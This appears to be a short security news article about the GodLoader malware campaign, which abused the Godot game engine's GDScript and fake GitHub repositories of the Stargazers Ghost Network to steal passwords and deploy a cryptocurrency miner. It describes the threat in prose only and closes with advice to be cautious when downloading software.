HQ/EMEAFind out how we can help your business
Threat actors have exploited the Godot game engine to bypass security detection and launched the new GodLoader malware. Based on reports, the new campaign has already infected at least 17,000 devices in three months.
Researchers explained that the attacks have compromised thousands of devices quickly since this malware loader could target gamers on all major platforms, including Windows, macOS, Linux, Android, and iOS.
Moreover, the campaign utilised Godot’s flexibility and GDScript scripting language features to run arbitrary code and elude detection systems by embedding malicious scripts in the game engine.
The GodLoader malware operation used its malicious code to harvest information on infected devices.
According to investigations, the GodLoader malware executes its malicious code once loaded on a victim’s device. This virus enables the threat actors to steal passwords or download additional payloads, such as the XMRig cryptocurrency miner.
Since June, hackers have allegedly used Godot Engine to execute forged GDScript code, triggering harmful commands and delivering malware. These activities have evaded various AV tools, potentially impacting thousands of devices in just a few months.
Furthermore, these incidents could significantly affect concerned parties as Godot has an active and growing developer community that appreciates its open-source nature and powerful features.
Over 2,700 developers have contributed to the Godot game engine, which has about 80,000 followers on several platforms, including Discord and YouTube. As of now, the researchers claimed that the malicious actors deployed the GodLoader malware via the Stargazers Ghost Network.
This network is a malware distribution-as-a-service (DaaS) that hides its actions behind seemingly legitimate GitHub projects.
Between September and October 2024, the hackers exploited over 200 repositories managed by over 225 Stargazer Ghost accounts to deliver malware to targets’ devices, capitalising on potential victims’ confidence in open-source platforms and supposedly legitimate software repositories.
Over the last couple of months, researchers have detected four separate attacks targeting developers and gamers, all of which enticed them to download infected tools and games.
Therefore, individuals from these communities should be aware of such emerging threats and avoid downloading trending software without verification. Users should be more cautious about acquiring products from open-source platforms, as some threat actors have infiltrated the field to offer their malicious tools.
